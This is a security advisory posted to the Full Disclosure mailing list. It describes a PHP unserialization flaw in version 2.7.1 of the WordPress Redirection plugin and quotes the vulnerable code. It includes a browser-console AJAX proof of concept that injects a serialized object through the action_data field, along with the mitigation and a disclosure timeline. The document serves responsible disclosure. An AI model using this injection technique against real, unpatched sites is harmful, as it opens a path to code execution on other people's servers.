[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] Unserialization vulnerability in Redirection could allow admin to execute arbitrary code in som
From: dxw Security <harry () dxw ! com>
Date: 2018-06-15 14:27:53
Message-ID: 9ccd562c12f072650bfaf6450ec7fbd9 () advisories ! dxw ! com
[Download RAW message or body]
Details
================
Software: Redirection
Version: 2.7.1
Homepage: https://wordpress.org/plugins/redirection/
Advisory report: https://advisories.dxw.com/advisories/unserialization-redirection/
CVE: Awaiting assignment
CVSS: 9 (High; AV:N/AC:L/Au:S/C:C/I:C/A:C)
Description
================
Unserialization vulnerability in Redirection could allow admin to execute arbitrary code in \
some circumstances
Vulnerability
================
It is possible for a user with the administrator privilege to submit a string that contains an \
encoded object that executes arbitrary code of the attacker’s choosing. The value can be passed \
in with an AJAX request to admin-ajax.php using the red_ajax_set_redirect action that is passed \
to the ajax_set_redirect method in this code: public function ajax_set_redirect( $params ) {
$params = $this->get_params( $params );
....
$result = $redirect->update( $params );
}
private function get_params( $params ) {
if ( empty( $params ) ) {
$params = $_POST;
}
return $params;
}
The update method then passes the attack string to this code:
class Red_Item {
public function update( $details ) {
$data = $sanitizer->get( $details );
$this->load_from_data( (object) $data );
}
private function load_from_data( stdClass $values ) {
foreach ( $values as $key => $value ) {
$this->$key = $value; }
}
The sanitizer does not sanitize the action_data value. Many calls to this class then use its \
to_json method, which is as follows: public function get_action_data() {
return $this->action_data ? $this->action_data : \'\';
}
public function to_json() {
maybe_unserialize( $this->get_action_data() ),
}
The sum effect is therefore that unsanitized user input is being passed to maybe_unserialize().
Proof of concept
================
Achieving arbitrary code execution depends on which classes are available (i.e. which plugins \
and themes are installed and active). It may not be possible in all situations. As such, this \
PoC will merely attempt to show that an arbitrary string can be passed to the \
maybe_unserialize() function.
Visit /wp-admin/tools.php?page=redirection.php
Create a new redirect with “/boo”, “https://www.dxw.com/”, and “Redirections”.
We’ll assume this redirect was given ID of 1 in the wp_redirection_items table. If that isn’t \
true, change the “id” value in the provided JavaScript. Then, without leaving the page, open \
your browser’s console and execute this JavaScript: jQuery.ajax(ajaxurl,{
method: \'POST\',
data: {
\'action\': \'red_set_redirect\',
\'_wpnonce\': window.Redirectioni10n.WP_API_nonce,
\'id\': \'1\',
\'match_type\': \'url\',
\'action_code\': \'1\',
\'action_type\': \'url\',
\'url\': \'https://www.dxw.com/\',
\'group_id\': \'1\',
\'action_data\': \'O:8:\"stdClass\":1:{s:5:\"hello\";s:5:\"world\";}\',
},
}).done(console.log)
Then, by inspecting the JavaScript object printed by console.log, or by looking at the Network \
logs, you’ll notice that we have a {“hello”: “world”} JavaScript object showing that our \
arbitrary string was passed to unserialize() and therefore, if the correct classes were \
available, we would be able to turn this into arbitrary code execution.
Mitigations
================
Upgrade to version 2.8 or later.
Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: \
https://advisories.dxw.com/disclosure/
Please contact us on security@dxw.com to acknowledge this report if you received it via a third \
party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your \
behalf.
This vulnerability will be published if we do not receive a response to this report with 14 \
days.
Timeline
================
2017-10-02: Discovered
2017-10-03: Reported via website contact form
2017-10-04: Response received. Author has asked for PoC: “The value for action_data is \
sanitised when it is passed through Red_Item_Sanitize”
2017-10-09: Developed a PoC
2017-10-10: Working PoC provided to author.
2017-10-18: Author reported fixed in 2.8
2018-06-06: Advisory published
2018-06-12: CVE requested
Discovered by dxw:
================
Glyn Wintle
Please visit advisories.dxw.com for more information.
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic